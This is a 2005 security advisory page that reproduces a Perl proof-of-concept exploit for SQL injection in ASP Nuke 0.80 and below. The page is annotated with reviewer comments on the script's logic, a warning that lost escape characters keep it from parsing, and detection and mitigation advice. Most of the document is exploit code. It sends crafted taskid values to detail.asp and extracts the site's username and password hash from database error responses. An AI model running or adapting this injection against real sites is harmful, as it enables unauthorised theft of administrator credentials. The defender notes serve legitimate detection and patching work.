HSC Research Group -
Advisories
Written by Hackers Center
Saturday, 23 April 2005 20:29 |
#!/usr/bin/perl
# Published proof-of-concept for an SQL injection in ASP Nuke (the banner
# below says 0.80 and below), kept here as it appeared in the advisory.
#
# What the listing shows:
#   - it takes a host (-h) and an optional port (-p, default 80);
#   - it sends two GET requests for /module/support/task/detail.asp in which
#     the taskid parameter carries a column name followed by an SQL comment
#     marker instead of a task identifier;
#   - it prints the text found between the first two quote characters of each
#     response, labelled as a username and as a SHA-256 password hash.
# Presumably the application returns a database error message that quotes the
# selected value; the script relies on that, but the page does not show a
# response, so treat this as an inference.
#
# NOTE(review): the page extraction dropped the escape sequences inside the
# string literals (line terminators and escaped quote characters), so the
# listing as shown does not parse as Perl. It is left exactly as published and
# is useful as a record of the request pattern only.
#
# Defender notes:
#   - Detection: look in web server logs for requests to detail.asp whose
#     taskid value is not purely numeric (assuming task ids are numeric in
#     normal use -- confirm against the application), in particular a value
#     ending in the SQL comment marker.
#   - Mitigation: validate taskid as an integer before it reaches the query,
#     use parameterised queries, return a generic error page instead of the
#     database error text, and move to a release that fixes the issue.
#
# No strict or warnings pragma is enabled; every variable is a package global.
use IO::Socket; use Getopt::Std; print "[x]ASP NUKE 0.80 and below Details.asp Sql Injection Exploit "; print "[x]By Diabolic Crab "; print "[x]http://www.digitalparadox.org
";
# Option parsing. Getopt::Std::getopt treats every character in its argument as
# a switch that takes a value, so -h and -p populate $opt_h and $opt_p; the
# colons follow the getopts() convention and are not needed here.
getopt("h:p:");
# Port falls back to 80 when -p is absent (or given as 0 or an empty string).
$opt_p ||= 80;
# The host is mandatory; without it the script stops with a usage message.
if(!$opt_h) { die("[x] Usage: $0 -h <host> [-p <port>] "); }
# Request targets: same page, taskid set to a column name plus a comment
# marker. These two strings are the pattern to search for in access logs.
$sqlpass = "/module/support/task/detail.asp?taskid=Password-- HTTP/1.0 "; $sqllogin = "/module/support/task/detail.asp?taskid=Username-- HTTP/1.0 ";
print "[x] Host: $opt_h "; print "[x] Port: $opt_p ";
# Request assembly: a GET line followed by a Host header, one request per
# column. The line terminators that separated them were lost in extraction.
$Q1 = "GET $sqllogin"; $Q1 .= "Host: ".$opt_h."
";
$Q2 = "GET $sqlpass"; $Q2 .= "Host: ".$opt_h."
";
# One TCP connection per request. Each response is read with a single recv of
# at most 1024 bytes, so only the start of the response is examined.
$s = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $opt_h, PeerPort => $opt_p) or die("Can"t connect!"); $s->send($Q1); $s->recv($usr, 1024);
$s = IO::Socket::INET->new(Proto=>"tcp", PeerAddr => $opt_h, PeerPort => $opt_p) or die("Can"t connect!"); $s->send($Q2); $s->recv($pass, 1024);
# Response parsing: $s is reused here as a string offset (it no longer holds
# the socket). The code takes the substring between the first and second
# occurrence of a delimiter character; the delimiter literal is garbled in this
# copy. If no delimiter is found, index returns -1 and the printed substring is
# whatever that arithmetic yields, so the output is not validated in any way.
$s = index($usr,"""); $e = index($usr,""", $s + 1); $f = $e - $s - 1; print "[x]Username is: "; print substr($usr, $s + 1, $f); print " ";
# Same extraction applied to the second response; the label states that the
# stored credential is a SHA-256 hash.
$s = index($pass,"""); $e = index($pass,""", $s + 1); $f = $e - $s - 1; print "[x]Password hash in SHA 256 is: "; print substr($pass, $s + 1, $f); print " ";